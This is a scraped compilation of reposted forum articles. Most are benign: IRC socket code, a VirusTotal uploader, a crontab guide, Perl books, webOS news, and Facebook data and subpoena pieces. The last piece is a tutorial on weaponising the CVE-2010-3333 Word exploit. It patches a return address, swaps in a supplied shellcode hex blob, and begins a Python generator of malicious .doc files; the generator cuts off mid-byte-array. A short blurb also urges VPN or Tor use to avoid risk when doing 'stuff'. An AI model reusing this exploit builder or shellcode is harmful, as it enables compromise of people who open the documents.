tv.tv_usec = 500000; event_add(m_pSendTimer, &tv); m_clSendCounter.SetTimeStep(0.5f); OnConnect(); } And finally, here's OnRead() which constructs lines (since SOCK_STREAM sockets may produce fragmented data). If there are unexpected problems (such as remote host closing connection), then it dispatches said events. void IrcClient::OnRead(evutil_socket_t fd, short what) { #ifdef _WIN32 int readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, (int)(sizeof(m_stagingBuffer)-1-m_stagingBufferSize),0); #else // _WIN32 ssize_t readSize = recv(m_socket, m_stagingBuffer + m_stagingBufferSize, sizeof(m_stagingBuffer)-1-m_stagingBufferSize,0); #endif // !_WIN32 if (readSize == 0) { Log("Remote host closed the connection."); OnDisconnect(); return; } else if (readSize < 0) { Log("recv() failed (%d): %s", errno, strerror(errno)); OnDisconnect(); return; } time(&m_lastRecvTime); m_stagingBufferSize += readSize; m_stagingBuffer[m_stagingBufferSize] = '\0'; char *p, *q; p = q = m_stagingBuffer; // We check the buffer size since Disconnect() can be called somewhere in ProcessLine() while (m_stagingBufferSize > 0 && (q = strpbrk(p,"\r\n")) != NULL) { *q = '\0'; m_stagingBufferSize -= (q-p) + 1; if (q != p) ProcessLine(p); p = q + 1; } memmove(m_stagingBuffer, p, m_stagingBufferSize); } Relevant snippits from BnxDriver.cpp Lastly, you need to actually dispatch the events. libevent makes this very simple. Here's BnxDriver::Run(). Notice that it can seamlessly handle multiple BnxBot objects with just one thread. bool BnxDriver::Run() { if (!Load()) return false; struct event_base *pEventBase; pEventBase = event_base_new(); for (size_t i = 0; i < m_vBots.size(); ++i) { m_vBots[i]->SetEventBase(pEventBase); m_vBots[i]->StartUp(); } event_base_dispatch(pEventBase); event_base_free(pEventBase); return true; } Conclusion For socket programming, you should definitely seek an event-driven design for simplicity and scalability. Enjoy. If you want to see the code, check the repository or download the source zip. It's too big to paste here. http://sourceforge.n.../85/tree/trunk/ http://sourceforge.n...s/ircbnx/files/ Sursa: Event driven socket programming - rohitab.com - Forums

[h=3]YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal[/h] Finished automation of a process to upload samples from multiple trackers. Hope You can add it to Your systems and daily jobs. History, requirements and installation – see here Link to get – YAPS.py don’t forget to remove _.txt ) What added: 1. Added check of sample, if it already present on VirusTotal database. If so – just data dumped to log 2. If sample not present – it uploaded to VirusTotal. 3. All info about samples: Is sample new, SHA256 hash, detect ratio and URL to review – dumped to vtlog.txt at same dir 4. Comments added – in case You need to comment samples. by default enabled on already detected samples. Edit comment variable if needed. Currently there is a problem to comment just submitted file – will be solved. 5. All this within ToS of VirusTotal and thx to them for good tool Hope it useful not to me Stay Safe D.L. #!/usr/bin/python # # Script to upload samples to VT via API # ver 0.3 # # Require: # * Requests python library - grab here http://docs.python-requests.org/en/latest/ # Usage: # python yaps.py path/to/malware.exe # Wildcard: # python yaps.py path/to/* or path/to/*.exe etc # # Variables: # api_key - take Your API from Virustotal # comment2add - comment that added to sample, in case You upload bunch of simular samples # # By Denis Laskov @it4sec http://ondailybasis.com # # Special thx: # @joelverhagen for hashing function sample import requests, sys, fileinput, time, hashlib api_key = '' #public API from VT comment2add = '#Malware ' if api_key == '': print 'API Key is empty. Go at www.virustotal.com and past one at api-key var' SHA = '' headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; uploaded by YAPS.py @it4sec)'} url = 'https://www.virustotal.com/vtapi/v2/file/scan' #URL to submit files url2 = 'https://www.virustotal.com/vtapi/v2/file/report' #URL to review reports url3 = 'https://www.virustotal.com/vtapi/v2/comments/put' #URL to submit comments post_data1 = {'apikey': api_key} def sha256sum_f(filePath): # SHA256 function fh = open(filePath, 'rb') m = hashlib.sha256() while True: data = fh.read(8192) if not data: break m.update(data) return m.hexdigest() def upload_f(filePath): # Upload sample func file2send = {'file': open(filePath, 'rb')} r = requests.post(url, post_data1, files=file2send, headers=headers) #print r.json return r.json def VTcheckl_f(hash_value): #check VT status of sample post_data2 = {'resource': SHA, 'apikey': api_key} print 'Checking: ', fileinput.filename(), ' sha256: ', SHA #print post_data2 r = requests.post(url2, post_data2, headers=headers) return r.json def timer_f(): # timer of 15 seconds to stay within VT API ToS print 'Waiting 15 seconds to comply VT ToS' time.sleep(15) def Report_f(isnew, json): # Func to write to report n = open('./vtlog.txt', 'a') n.write ('\n\nAlready reported: ' + str(isnew)) n.write ('\nFilename: ' + str(fileinput.filename())) n.write ('\nsha256: ' + str(json['sha256'])) try: n.write ('\nDetection Ratio: ' + str(json['positives']) + '/' + str(json['total'])) except KeyError: n.write ('\nDetection Ratio: Unknown' ) pass n.write ('\nURL: ' + str(json['permalink'])) n.close def Comment_f(SHAsum): post_data3= {'resource': SHA, 'apikey': api_key, 'comment': comment2add} r = requests.post(url3, post_data3, headers=headers) for line in fileinput.input(): SHA = sha256sum_f(fileinput.filename()) response = VTcheckl_f(SHA) status = response['response_code'] if status == 0: print 'New sample: ', fileinput.filename(), ' uploading' timer_f() newstatus = upload_f(fileinput.filename()) Report_f('No', newstatus) #Comment_f(SHA) if status != 0: print 'Sample ', fileinput.filename(), ' already known or in process' Report_f('Yes', response) Comment_f(SHA) timer_f() fileinput.nextfile() Sursa: Day by day… | YAPS.py 0.3 released – Python script to upload samlpes to VirusTotal

[h=2]How to: Use crontab to schedule tasks[/h]Sunday, January 06, 2013 If you want to schedule to run a command or script periodically, crontab will be a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is: sudo crontab -e On my Arch Linux box, the default text editor is "vi" but on Linux Mint, when you run this command the first time, you will be asked to choose a text-editor. And similarly, the crontab file of Arch Linux is pure blank when the one of Linux Mint has many useful comment lines for you to understand how to use crontab. Here is the how the crontab file looks on Linux Mint (the text editor is nano ): The comment lines in the image above explain quite well about how to use crontab. The format to schedule a task with crontab is: * * * * * /any/command/or/script As you can see, there are 5 stars ( with a space between 2 stars) and each star represents one part of the date format in the following order: - minute ( value = 0 -> 59) - hour ( 0 -> 23) - day of month ( 1 -> 31) - month ( 1 -> 12) - day of week ( 0 -> 6 with 0 = Sunday) In short, to set a certain period to run a script, you just need to replace each star with a specific value. Note: If you dont need to set any value for a star, just leave the star in the command. A star means "every" so a command with all 5 stars will mean to run a task every minute until you delete this command from the crontab schedule. For example, to run a script at 7:00 AM on every Monday in the first three months of the year, the command will be: 0 7 * 1-3 1 /path/to/the/script As you can see, crontab is quite flexible with it format. You can use 1-5 in the day of week value to schedule a task to be run on work days. Or to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day of week value. For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, Feb, May and Oct, the command will be: 0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script Crontab also has some special keywords for you to use: @reboot at startup @yearly once a year @annually ( == @yearly) @monthly once a month @weekly once a week @daily once a day @midnight ( == @daily) @hourly once an hour If you use the keywords, you dont need to use the stars. For example, to run a script once everyday, the command will be: @daily /path/to/the/script And after you insert the right command the crontab file, just save the file and everything is scheduled now. To check the task you have scheduled with crontab, the command to use will be: sudo crontab -l Sursa: How to: Use crontab to schedule tasks ~ Linux and Life

16 of the Best Free Perl Books Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license. Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister. Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming. One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules. The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing. [TABLE=width: 100%] [TR] [TD=colspan: 2] 1. Modern Perl [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.onyxneon.com/books/modern_perl/index.html[/TD] [/TR] [TR] [TD]Author[/TD] [TD]chromatic[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, A4 PDF, HTML, ePub[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]204[/TD] [/TR] [/TABLE] Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed. Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code. This book providing a wealth of information on: The Perl Philosophy Perl and its Community focusing on CPAN, community and development sites The Perl Language introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures Operators - a series of one or more symbols used as part of the syntax Functions - a discrete, encapsulated unit of behaviour Regular Expressions and Matching - the use of these expressions gives Perl its incredible text processing power Objects - discrete, unique entities with their own identities Style and Efficacy explaining the importance of writing maintainable, idiomatic, and effective Perl Managing Real Problems covering testing, handling warnings, files, modules, distributions, and more Perl Beyond Syntax What to Avoid The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. 2. Beginning Perl [TABLE=width: 100%] [TR] [TD]Website[/TD] [TD]www.perl.org/books/beginning-perl/[/TD] [/TR] [TR] [TD]Author[/TD] [TD]Simon Cozens[/TD] [/TR] [TR] [TD]Format[/TD] [TD]PDF, HTML[/TD] [/TR] [TR] [TD]Pages[/TD] [TD]672 [/TD] [/TR] [/TABLE] Beginning Perl is a book which as its name suggest is written for individuals that are new to programming who want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully through up to complex operations such as using Perl as a CGI language. The book covers the following topics: Installing Perl on Windows and UNIX Making use of online Perl resources like CPAN First principles in programming and the Perl syntax Working with simple values Lists and Hashes Loops and Decisions Regular Expressions Working with files and databases Writing web pages in Perl Subroutines Running and Debugging Perl Modules Using Perl as an object-oriented language Perl and Databases The World of Perl The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License. Restul cartilor: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html

[h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7 [/h]by Derek Kessler Mon, 31 Dec 2012 1:05 pm EST As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premiere launch devices for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure. Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus, so a lot of the work put into the smartphone project could be easily translated to the Nexus 7. How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college. The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project. A video of the port in action is after the break, and as an early alpha we're rather impressed. Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7 and more open source-y. Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing. The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next. Sursa: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation

http://www.youtube.com/watch?v=w9X1CP_jF6k

Si daca de exemplu folosesc autoruns? Sau alte 20 de utilitare?

Smartmeter Description: SMARTMETER A technological overview of the German roll-out This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany. SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planed roll-out and the laws and technical guidelines. The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi) which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication related details of whole smart meter infrastructure have to be implemented to provide security and interoperability. This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Smartmeter

At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2 Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2 Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2

[h=1]Cum vor sa castige bani retelele sociale precum Facebook[/h] Acoperirea a milioane de consumatori (potentiali clienti) Exista numeroase moduri de a ajunge la un anumit public in marketing. Printre acestea, se numara formularea unui chestionar pentru o cunoastere consolidata a propriei clientele si a mediilor in care sa faceti publicitate produsului dumneavoastra pentru a-l vinde cel mai bine. De exemplu, daca vindeti un tractor nou pentru o ferma agricola, ii veti face publicitate intr-o revista cumparata cu predilectie de fermieri. Astfel, acoperiti un segment de piata care va asigura cel mai mare volum de vanzari. Internetul et cookie-urile Daca detin un software care analizeaza frecventa operatiunilor de cumparare de catre fermieri pentru un anumit teritoriu... de exemplu, pot lansa cookie-uri pe un site web de vanzari online de tractoare pentru a inregistra de unde provin persoanele care viziteaza site-ul, care vand sau cumpara aceste tractoare, etc.. Ti-as putea spune, daca ai recurs la serviciile mele, la ce targ agricol ar trebui sa mergi pentru a avea cele mai mari sanse sa iti vinzi tractoarele. Asta pentru ca cookie-urile mele au detectat numerosi clienti potentiali in zona respectica. Cat ai fi dispus sa platesti pentru un astfel de serviciu de marketing? Investitiile pentru gasirea unor potentiali clienti s-ar reduce enorm, intrucat nu trebuie sa angajezi o armata de vanzatori care sa prospecteze piata in ani si ani de zile. Astfel, Facebook si retelele de socializare in general utilizeaza astfel de cookie-uri, sau ar putea sa le utilizeze pentru a gasi cumparatorii (cumparatoarele) unor diverse produse, indiferent ca sunt de lux ori produse de uz zilnic. Iar intreprinderile nu ar trebui decat sa cumpere aceste liste. Astfel de liste sunt disponibile in agentii de publicitate din intreaga lume. Acestea au un pret initial care variaza in functie de piata pe care doresti sa o abordezi. Cu cat lista este mai specializata, cu atat crearea acesteia costa mai mult, si pretul de vanzare este mai mare. O lista de baza, precum nume, prenume, adresa, nr. de telefon, etc., costa aproximativ 40 de dolari pentru 1000 de clienti potentiali, in SUA. O lista cu informatii precum activitatile exercitate, orasul de resedinta, numarul de proprietati dobandite de-a lungul vietii, stilul de viata al cumparatorilor, etc., are un pret mediu de aproximativ 120 de dolari pentru 1000 de clienti potentiali, tot in SUA. In prezent, Facebook merge si mai departe, datorita cookie-urilor si a obiceiurilor de cumparare ale consumatorilor. Aceasta va permite stabilirea ca tinta precisa a milioane de persoane, cu o fiabilitate marita cu 500%, intrucat Facebook poate utiliza un program software de recunoastere a cuvintelor de pe site-ul propriu. De exemplu, programul software poate urmari toate persoanele care au folosit cuvantul Mercedes Benz in postarile lor. Facebook va putea stabili astfel o lista de marketing extrem de precisa. Si bineinteles, pretul unei astfel de liste creste. Imaginati-va ca sunteti pe Facebook, discutati cu fratele ori cu un cumnat, si spuneti la un moment dat: „Da, ma gandesc sa cumpar o masina noua, un Mercedes Benz, in vreo doua zile”. Programul software recupereaza numele dumneavoastra, numele de utilizator, orasul in care locuiti, activitatea profesionala exercitata si orice alte informatii pertinente pentru a-si da seama de la ce firma de vanzare de automobile ati putea cumpara masina. Un reprezentant Facebook va suna la respectiva firma si va conveni cu aceasta sa ii furnizeze aceste informatii contra unei sume de bani. Dumneavoastra veti primi un telefon de la firma de automobile in cauza, care va invita sa profitati de o oferta de nerefuzat… Si uite-asa avem un tip de marketing cu o tinta extrem de precisa. Iar aceasta practica va aduce un venit de miliarde de dolari retelei Facebook. O astfel de lista poate ajunge la 2500 pana chiar la mai mult de 5000 de dolari pentru 1000 de clienti potentiali, inmultit, evident, cu numarul de utilizatori de Facebook. Evident, Facebook va stabili, de asemenea, asocieri, legaturi cu alte site-uri, va recomanda membrilor cumparaturi, prin intermediul altor site-uri, si altele de acest gen (marketing indirect). Iti poti face macar o cat de mica idee de bogatia pe care o detine aceasta companie. Iar acest proces urmeaza sa fie implementat de toate retelele sociale care exista in prezent pe web. Sursa: Cum vor sa castige bani retelele sociale precum Facebook

[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h] Daca tot faceti "chestii", nu va riscati. Folositi cel putin VPN (ca cele de aici). Daca nu e ok, atunci Tor. Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/

When the cops subpoena your Facebook information, here's what Facebook sends the cops NU e noua informatia, dar mi se pare utila. Published Apr 06 2012, 08:30 AM by Carly Carioli -- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case. One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act. In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data. This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook ID's were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it: Gasiti aici PDF: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx

Reversing a Malicious Word Document Anonymous January 04, 2013 In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, providing an exploit sample is available. I have taken exploit sample CVE 2010-3333 in order to complete this exercise. So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and have to analyze something suspicious. When I opened the document in hex, I found something suspicious as an address in pFragment parameter and that is bc41db77; let’s search this address in debugger (77db41bc): Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture: Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it/s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available. It can be made workable on xp sp3, by taking any address from the xp sp3 dll. I took it from kernel 32.dll ‘jmp esp address and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine. When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it. C:/RECYCLER/server.exe does the following: • Drops a file in the system’s temp folder: vmm2.tmp • File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll • Makes registry modifications in an attempt to hijack the DHCP service The payload has the ability to: • Download additional malware • Connect and send sensitive data back to remote servers • Act as a trojan proxy server So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it. 1) In hex editor 2) In debugger Let me open sample in hex editor and try to find the shell code for server.exe. While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure: at eeeeeeeeeeeee After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction XOR BYTE PTR DS [EDX+ECX], 0EE Also encryption begins from last to start, that is from eeeeeeee to the start of the shell code. Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE] So I will replace the existing shell code with our own code. After replacing, the sample looks like this: Now, after executing it, it should execute calc. Wow, calc pops up. Now it’s time to analyze the drop dll, which has been dropped into system32 with the name of dhcpsrv.dll. After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in c:\windows\system32 folder, as in picture, and that is going to be executed by rundll32.exe. We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with debugger. There is a process in attaching debugger. I am going to attach it with WinWord, as it is an Office document file. After attaching and before executing, we have to set a breakpoint (F2) in debugger on various win32 function. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions that are desirable to set a breakpoint before reversing. They are: CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLIbrary, etc. After setting a breakpoint, we have to Step Over (F8 ) in debugger and while doing this we will have to look carefully for some suspicious address in the stack windows of debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function get loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel ). After a long analysis, we find that the CreateFile function gets loaded at a suspicious address, that is, The CreateFile function gets loaded at the suspicious address (0011f438). A point to be noted is that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address. In the above picture, look at the stack windows. There is a call to CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438. The CreateFile function gets loaded at the suspicious address (0011f438). Note that this address may change from computer to computer. Now our main job should be to find the actual location of the embedded dll/exe, that is start location and end location of exe/dll, and the algorithm by which exe/dll has been encrypted. To do that, we will start analyzing line by line from the beginning of the suspicious address. We find the following instruction: 00115F4E AC LODS BYTE PTR DS : [ESI] 0011F54F 3C 00 CMP AL, 0 0011F551 74 06 JE SHORT 0011F559 0011F553 3C FC CMP AL, 0FC 0011F555 74 02 JE SHORT 0011F559 0011F557 34 FC XOR AL, 0FC 0011F559 AA STOS BYTE PTR ES : [EDI] 0011F55A E2 F2 LOOPD SHORT 0011F54E Let’s look at the two boldfaced instructions: 00115F4E AC LODS BYTE PTR DS : [ESI] This instruction reads the address stored at ESI and stores its value to EAX, while the instruction 0011F559 AA STOS BYTE PTR ES : [EDI] stores the value of EAX to the EDI . So the encryption algorithm is to read each byte of exe; if it is 0 or OFC then leave it as it is, if not then XOR with OFC as in the instruction 0011F557 34 FC XOR AL, 0FC So we found the encryption. The next steps is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in dump windows: There is some sequence of values with ASCII 6161616161, etc.; let’s search this value in the Hex of the exploit sample: While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in dump ), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file ). If MZ is found, it indicates that this is the beginning of exe. Now what is the total size of exe? For that, we have to check the file that’s dropped into c:/windows/system32 dhcpsrv.dll, open it in the hex editor, and find the total size; this will be the total size of exe/dll. We find the total size of dll is DLL ADD8 in hex, 44504 in decimal. So now we have found: Encryption algorithm Start Location of dll/exe End location of dll/exe Now our main job is to write the creator with proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below. The point where MZ is found is the start point of exe. Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in the mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in the system32 (dll file ). So now it’s time to write the full creator code that I have written in Python. Here is the full creator: import datetime import os header = ("\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31" "\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67" "\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64" "\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33" "\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68" "\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C" "\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C" "\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74" "\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63" "\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A" "\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33" "\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D" "\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C" "\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27" "\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" 